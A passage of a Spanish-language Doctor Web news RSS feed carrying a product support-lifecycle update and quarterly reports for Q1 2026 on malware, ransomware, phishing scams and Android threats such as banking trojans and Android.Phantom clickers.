&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Indicadores de compromiso&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15257&amp;lng=es</guid><title>Cambio en los plazos de soporte de los productos Dr.Web</title><link>https://news.dr-web.es/show/?i=15257&amp;lng=es&amp;c=5</link><pubDate>Tue, 26 May 2026 11:46:48 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;De conformidad con la política del ciclo de vida, se han ampliado los plazos de soporte de varios productos Dr.Web.&lt;/newslead&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Centro de Control Dr.Web Enterprise Security Suite, versión 13.0&lt;/li&gt;&lt;li&gt;Dr.Web Industrial, versión 13.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Como parte de Dr.Web Desktop Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 para estaciones de trabajo Windows&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 para estaciones de trabajo macOS&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 para estaciones de trabajo Linux&lt;/li&gt;&lt;li&gt;Dr.Web Katana Business Edition 1.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Como parte de Dr.Web Server Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 para servidores Windows&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 para servidores UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 para servidores macOS&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Como parte de Dr.Web Mail Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 para servidores de correo UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 para Microsoft Exchange Server&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Como parte de Dr.Web Gateway Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 para Gateways de Internet UNIX&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Como parte de Dr.Web Mobile Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 para dispositivos móviles Android&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;La información actualizada sobre los plazos de soporte está disponible en la &lt;a href="https://support.drweb.com/lifecycle/"&gt;página del ciclo de vida de los productos&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15135&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus en el I trimestre de 2026</title><link>https://news.dr-web.es/show/?i=15135&amp;lng=es&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 de abril de 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Según las estadísticas de detecciones del antivirus Dr.Web, en el I trimestre de 2026 el número total de amenazas detectadas disminuyó un 6,77 % en comparación con el IV trimestre del año pasado. El número de amenazas únicas se redujo un 11,98 %. En los dispositivos protegidos se detectaron con mayor frecuencia adware y troyanos publicitarios, malware descargador, así como backdoors.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;En el tráfico de correo, lo más habitual fueron scripts maliciosos, backdoors y diversas aplicaciones troyanas. A través de correos electrónicos, los atacantes también distribuían documentos de phishing y exploits.&lt;/p&gt;

&lt;p&gt;Los usuarios cuyos archivos se vieron afectados por troyanos cifradores se enfrentaron con mayor frecuencia a los cifradores &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; y &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;En el I trimestre de 2026, los analistas de internet de la empresa Doctor Web detectaron nuevos sitios de phishing, incluidos recursos falsos de entidades de crédito y marketplaces, así como una serie de otros sitios no deseados.&lt;/p&gt;

&lt;p&gt;En el segmento de los dispositivos móviles se observó un aumento de la actividad de los troyanos bancarios. Al mismo tiempo, nuestros analistas de virus señalaron un incremento de la popularidad de la técnica de protección del malware frente a la detección por parte del software antivirus, que consiste en añadirles código basura.&lt;/p&gt;

&lt;p&gt;En enero, los expertos de Doctor Web informaron sobre los troyanos clicker &lt;b&gt;Android.Phantom&lt;/b&gt;, que utilizan aprendizaje automático y retransmisiones de vídeo para inflar artificialmente los clics en sitios web. Además, durante los últimos 3 meses hemos registrado la aparición de nuevo malware en el catálogo de Google Play, así mismo, de troyanos que suscribían a los usuarios a servicios de pago.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principales tendencias del I trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Se redujo el número de amenazas detectadas en los dispositivos protegidos &lt;/li&gt;
        &lt;li&gt;Entre las amenazas detectadas disminuyó el número de archivos únicos&lt;/li&gt;
        &lt;li&gt;En comparación con el periodo de observación anterior, se registraron menos solicitudes de descifrado de archivos afectados por programas troyanos cifradores&lt;/li&gt;
        &lt;li&gt;Continuó el crecimiento de la actividad de los troyanos bancarios para dispositivos Android&lt;/li&gt;
        &lt;li&gt;Los usuarios estuvieron amenazados por malware clicker &lt;b&gt;Android.Phantom&lt;/b&gt;, que utiliza, entre otras cosas, tecnologías de aprendizaje automático para inflar artificialmente los clics en sitios web&lt;/li&gt;
        &lt;li&gt;En el catálogo de Google Play se detectó nuevo malware&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Según los datos del servicio de estadísticas Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Las amenazas más populares del I trimestre de 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Un troyano creado en el lenguaje de programación Go y destinado a descargar en el sistema objetivo varios mineros y adware. El malware es un archivo DLL y se encuentra en &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Para su ejecución explota una vulnerabilidad de la clase DLL Search Order Hijacking en el cliente torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Adware.Downware.20655&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Un adware que actúa como instalador intermedio de programas pirata.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Detección de un componente malicioso de la extensión de navegador WinSafe. Este componente es un script JavaScript que muestra publicidad intrusiva en los navegadores.&lt;/dd&gt;
    &lt;dt&gt;Adware.Siggen.33379&lt;/dt&gt;
    &lt;dd&gt;Falso bloqueador de publicidad para navegador Adblock Plus, que se instala en el sistema mediante otro malware con el fin de mostrar publicidad.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Estadísticas de malware en el tráfico de correo&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Las amenazas más populares del I trimestre del año 2026 en el tráfico de correo&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;JS.DownLoader.1225&lt;/dt&gt;
    &lt;dd&gt;Detección heurística para archivos ZIP que contienen scripts JavaScript con nombres sospechosos.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Familia de troyanos descargadores que utilizan vulnerabilidades de documentos de Microsoft Office. Están destinados a descargar otro malware en el ordenador atacado.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploits para aprovechar vulnerabilidades en software de Microsoft Office, que permiten ejecutar código aleatorio.&lt;/dd&gt;
    &lt;dt&gt;JS.Redirector.514&lt;/dt&gt;
    &lt;dd&gt;Script malicioso que redirige al usuario a una página web controlada por los atacantes.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Cifradores&lt;/h3&gt;

&lt;p&gt;En el I trimestre de 2026, el número de solicitudes de descifrado de archivos afectados por programas troyanos cifradores se redujo un 31,51 % en comparación con el IV trimestre del año anterior. El descenso se produjo en el contexto de las vacaciones de Año Nuevo y los largos días festivos relacionados con ellas, durante los cuales algunos ciberdelincuentes podían suspender su actividad e irse de vacaciones. Al mismo tiempo, los usuarios que sí resultaron afectados por ataques de troyanos cifradores en ese periodo podían no reaccionar inmediatamente ante los incidentes ocurridos.&lt;/p&gt;

&lt;p&gt;Dinámica de recepción de solicitudes de descifrado en el Servicio de Soporte Técnico de Doctor Web:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Cifradores más populares del I trimestre de 2026&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 15,59% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.Encoder.29750&amp;lng=es"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3,23% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868 &lt;/b&gt; — 3,23% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.Encoder.26996&amp;lng=es"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 1,62% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383 &lt;/b&gt; — 1,61% de solicitudes de usuarios&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Fraudulencias en la red&lt;/h3&gt;

&lt;p&gt;Durante los últimos 3 meses, los analistas de internet de la empresa Doctor Web detectaron una serie de nuevos sitios falsos de marketplaces. En ellos, los atacantes ofrecen participar en una «liquidación» de supuestos pedidos no recogidos. El esquema fraudulento es el siguiente: los artículos «no reclamados» de los pedidos se dividen en distintas categorías (electrónica, ropa, calzado, cosmética, etc.) y supuestamente se colocan en las correspondientes cajas sorpresa. Se desconoce su contenido y este puede incluir, entre otras cosas, artículos caros. Al mismo tiempo, a las potenciales víctimas se les ofrece comprar esas cajas por un precio relativamente bajo, lo que constituye el principal gancho.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio falso del marketplace promete una «liquidación de pedidos no reclamados» que supuestamente están desbordando los almacenes&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Cuando el usuario elige una de las cajas, se le propone tramitar el pedido e indicar los datos personales, que pueden incluir nombre y apellidos, número de teléfono móvil y dirección de correo electrónico. Después se le redirige a una página de pago a través del Sistema de Pagos Instantáneos. Como resultado, la víctima pierde dinero y entrega la información confidencial a los estafadores.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.2.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Una vez tramitado el «pedido», se propone a la víctima pagarlo a través del Sistema de Pagos Instantáneos&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nuestros expertos también detectaron múltiples sitios de servicios que ofrecen varios servicios financieros, por ejemplo, la posibilidad de obtener bastante un micropréstamo, un crédito bastante rápido o pasar por un procedimiento de quiebra. Tales servicios no prestan por sí mismos esos servicios, como esperan los usuarios, y son solo intermediarios entre los clientes y las organizaciones financieras. De pago, dan acceso a una selección de opciones potencialmente adecuadas, mientras que la agregación de este tipo de ofertas financieras está disponible en fuentes gratuitas. Además, estos servicios no garantizan un resultado satisfactorio al presentar la solicitud. Al mismo tiempo, el pago por el acceso no es único, sino que constituye una suscripción de pago con cargos periódicos.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno de los sitios web en los que el acceso al servicio de selección de ofertas financieras es de pago y se formaliza en forma de suscripción&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;En algunos casos, este tipo de recursos puede inducir a error a los usuarios, ofreciendo un servicio, por ejemplo, empleo, pero en realidad proporcionando acceso a las mismas ofertas financieras para la obtención de créditos, micropréstamos, etc mediante suscripción.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web promete ayuda en la búsqueda de empleo, pero tras pagar el acceso al servicio, en lugar de una lista de vacantes puede proporcionar ofertas financieras de socios para obtener un crédito, un micropréstamo y similares&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Entre los sitios de phishing detectados en el I trimestre había recursos falsos en Internet de la carrera benéfica «Maratón Verde». En ellos se ofrece a los visitantes registrarse para participar en el maratón; sin embargo, estos sitios no guardan relación con el evento y han sido creados para recopilar datos confidenciales de los usuarios.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno de los sitios falsos de la carrera «Maratón Verde»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Los analistas de internet de Doctor Web también detectaron nuevos sitios falsos de servicios de inversión, supuestamente relacionados con distintas entidades de crédito. Entre ellos había sitios orientados a público de Rusia, Kazajistán y otros países. Los estafadores prometen a las potenciales víctimas altos beneficios y, para «acceder» a las pseudoplataformas de inversión, les piden completar una breve encuesta y registrar una cuenta, indicando información personal.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de sitio de phishing que los atacantes hacen pasar por el recurso oficial del servicio de inversión de uno de los bancos rusos&lt;/em&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de sitio de phishing que los atacantes hacen pasar por el recurso oficial del servicio de inversión de una de las entidades de crédito de Kazajistán&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.dr-web.es/dangerous_urls/"&gt;Conozca más sobre los sitios web no recomendados por el antivirus Dr.Web &lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Malware y software no deseado para dispositivos móviles&lt;/h3&gt;

&lt;p&gt;Según los datos de las estadísticas de detecciones de Dr.Web Security Space para dispositivos móviles, en el I trimestre de 2026 continuó el crecimiento de la actividad de los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, que se había observado en el IV trimestre del año anterior. Los más frecuentes entre ellos fueron representantes de la subfamilia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. Al mismo tiempo, volvió a reducirse el número de detecciones de los troyanos publicitarios &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Entre el software potencialmente peligroso detectado, encabezaban la lista los programas en los que, mediante herramientas de modding, se había insertado código basura (se detectan como &lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Esta técnica se emplea actualmente de forma activa para proteger los troyanos bancarios frente a su detección por los antivirus. Además, seguían siendo frecuentes las aplicaciones modificadas con la utilidad NP Manager (se detectan como &lt;a href="https://vms.dr-web.es/search/?q=Tool.NPMod&amp;lng=es"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;El software no deseado detectado con mayor frecuencia fueron los falsos antivirus &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, que para «eliminar» las supuestas amenazas detectadas exigen comprar la versión completa. El adware más activo en el I trimestre fueron los programas &lt;a href="https://vms.dr-web.es/search/?q=Adware.Bastion&amp;lng=es"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; y &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Los primeros son aplicaciones optimizadoras que crean notificaciones con mensajes sobre una supuesta falta de memoria y errores del sistema para mostrar publicidad durante la «optimización». Los segundos son falsos programas de trucos para obtener diversos recursos en juegos, pero en realidad solo cargan sitios web con publicidad.&lt;/p&gt;

&lt;p&gt;En enero de 2026, nuestro laboratorio antivirus &lt;a href="https://news.dr-web.es/show/?i=15110" target="_blank"&gt;advirtió&lt;/a&gt; sobre los troyanos clicker &lt;b&gt;Android.Phantom&lt;/b&gt;. Este malware utiliza aprendizaje automático y retransmisiones de vídeo para inflar artificialmente los clics en sitios web. Los ciberdelincuentes lo distribuían de varias maneras a la vez: a través del catálogo GetApps para dispositivos Xiaomi, canales de Telegram, servidores de Discord, recopilaciones de software de terceros y sitios maliciosos.&lt;/p&gt;

&lt;p&gt;Durante los últimos 3 meses, los analistas de virus de Doctor Web detectaron en el catálogo de Google Play nuevas amenazas, entre las que había aplicaciones troyanas &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, destinadas a suscribir a los usuarios a servicios de pago.&lt;/p&gt;

&lt;p&gt;Los eventos más destacados vinculados a la seguridad “móvil” en el I trimestre&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; se convirtieron en las amenazas más frecuentes para los dispositivos Android&lt;/li&gt;
    &lt;li&gt;Los ciberdelincuentes utilizaron con mayor frecuencia utilidades para el modding de aplicaciones Android, con el fin de proteger los troyanos bancarios frente a su detección por los antivirus&lt;/li&gt;
    &lt;li&gt;Continuó la tendencia a la disminución de la actividad de los troyanos publicitarios &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;Los usuarios estuvieron amenazados por los troyanos &lt;b&gt;Android.Phantom&lt;/b&gt;, que utilizan aprendizaje automático y retransmisiones de vídeo para inflar artificialmente los clics en sitios web&lt;/li&gt;
    &lt;li&gt;En el catálogo de Google Play volvió a difundirse malware&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Lea con más detalle sobre la situación viral para dispositivos móviles en el I trimestre de 2026 en nuestro &lt;a href="https://news.dr-web.es/show/review/?i=15136" target="_blank"&gt;informe&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15136&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus para dispositivos móviles en el I trimestre de 2026</title><link>https://news.dr-web.es/show/?i=15136&amp;lng=es&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 de abril de 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Según los datos de las estadísticas de detecciones de Dr.Web Security Space para dispositivos móviles, en el I trimestre de 2026 continuó el descenso de la actividad del malware &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, que muestra publicidad molesta. Los primeros se detectaron en los dispositivos protegidos un 32,70 % menos, y los segundos, un 7,09 % menos en comparación con el IV trimestre del pasado año. Cedieron el liderazgo a los troyanos bancarios de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, cuya actividad aumentó más de 2,5 veces en los últimos 3 meses. Como resultado, estos se convirtieron en las amenazas para Android más extendidas. Este malware intercepta SMS con códigos de confirmación de operaciones bancarias, muestra ventanas de phishing y también puede imitar el aspecto del software bancario auténtico para robar datos confidenciales. Los usuarios se enfrentaron con mayor frecuencia a los troyanos de la subfamilia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, de la que forman parte diversas muestras de malware.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;En el I trimestre se generalizó ampliamente el uso de aplicaciones a las que, con ayuda de herramientas de hacking para el modding NP Manager, se añadió código basura con el fin de confundir la lógica (15,35 % del número total de detecciones). Desde el otoño del año pasado, estas herramientas se utilizan activamente en los troyanos de la familia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; para dificultar su detección por los antivirus, por lo que advertimos de que una u otra aplicación ha sido modificada. Los productos antivirus Dr.Web detectan este tipo de programas como &lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Otro software potencialmente peligroso muy popular, a pesar del descenso del número de detecciones en un 31,65 %, volvió a ser el de los programas modificados con la utilidad NP Manager (detectados por Dr.Web como &lt;a href="https://vms.dr-web.es/search/?q=Tool.NPMod&amp;lng=es"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;). Esta utilidad contiene varios módulos para la protección y ofuscación del código de los programas, así como para esquivar la verificación de su firma digital después de la modificación. Los ciberdelincuentes la utilizan para proteger el malware con el fin de dificultar su detección por los antivirus.&lt;/p&gt;

&lt;p&gt;Las aplicaciones no deseadas más populares fueron los falsos antivirus &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, que supuestamente detectan amenazas y exigen adquirir la versión completa para su «eliminación». Además, los usuarios volvieron a enfrentar programas de las familias &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;. Los primeros supuestamente permiten ganar dinero realizando varias tareas. Los segundos son software modificado a través del servicio en la nube CloudInject. Con su ayuda, a las aplicaciones se les añaden permisos del sistema peligrosos y código ofuscado cuya funcionalidad no se puede controlar.&lt;/p&gt;

&lt;p&gt;Entre el adware, los líderes por número de detecciones fueron los programas optimizadores &lt;a href="https://vms.dr-web.es/search/?q=Adware.Bastion&amp;lng=es"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. De forma periódica, crean notificaciones con mensajes engañosos sobre una supuesta falta de memoria y errores del sistema. Su objetivo es mostrar publicidad durante la «optimización». Otro adware popular fueron las aplicaciones &lt;b&gt;Adware.Opensite.15&lt;/b&gt;, que los atacantes hacen pasar por herramientas de trucos para obtener recursos en juegos. En realidad, estos programas cargan diversos sitios con anuncios. También volvieron a difundirse programas con módulos publicitarios integrados &lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;En enero, la empresa Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15110" target="_blank"&gt;informó&lt;/a&gt; a los usuarios sobre &lt;b&gt;Android.Phantom&lt;/b&gt;, una nueva familia de troyanos clicker. Nuestros analistas de virus detectaron varias fuentes de distribución de este malware. Entre ellas, el catálogo oficial de aplicaciones GetApps para dispositivos Xiaomi, donde los troyanos fueron incorporados en varios juegos. Además, los ciberdelincuentes distribuían los clickers junto con mods de aplicaciones populares a través de varios canales de Telegram, servidores de Discord, recopilaciones de software en línea y sitios maliciosos.&lt;/p&gt;

&lt;p&gt;Con ayuda de &lt;b&gt;Android.Phantom&lt;/b&gt;, los atacantes inflan artificialmente los clics publicitarios en sitios web, utilizando para ello tecnologías de aprendizaje automático y WebRTC, una tecnología de transmisión de datos en streaming (incluido vídeo) a través del navegador. Los troyanos cargan en un WebView invisible los recursos de Internet objetivo junto con código JavaScript para simular acciones del usuario. La interacción con los anuncios se produce en uno de dos modos. Si en el dispositivo es posible utilizar WebRTC, los clickers &lt;b&gt;Android.Phantom&lt;/b&gt; transmiten a los atacantes una pantalla virtual con el sitio cargado, y estos la controlan manualmente o mediante un sistema automatizado.&lt;/p&gt;

&lt;p&gt;Si WebRTC no está disponible, se aplican scripts automatizados en lenguaje JavaScript que utilizan el framework TensorFlowJS. Los clickers descargan desde un servidor remoto el modelo de comportamiento necesario, así como JavaScript que contiene el propio framework y todas las funciones necesarias para el funcionamiento del modelo y la interacción con los sitios objetivo.&lt;/p&gt;

&lt;p&gt;Durante el I trimestre, el laboratorio antivirus de la empresa Doctor Web registró la aparición de nuevas amenazas en el catálogo de Google Play. Entre ellas, numerosas aplicaciones troyanas, así &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, asó como el malware &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;. Todos ellos han sido creados para suscribir a los usuarios a servicios de pago.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principales tendencias del I trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
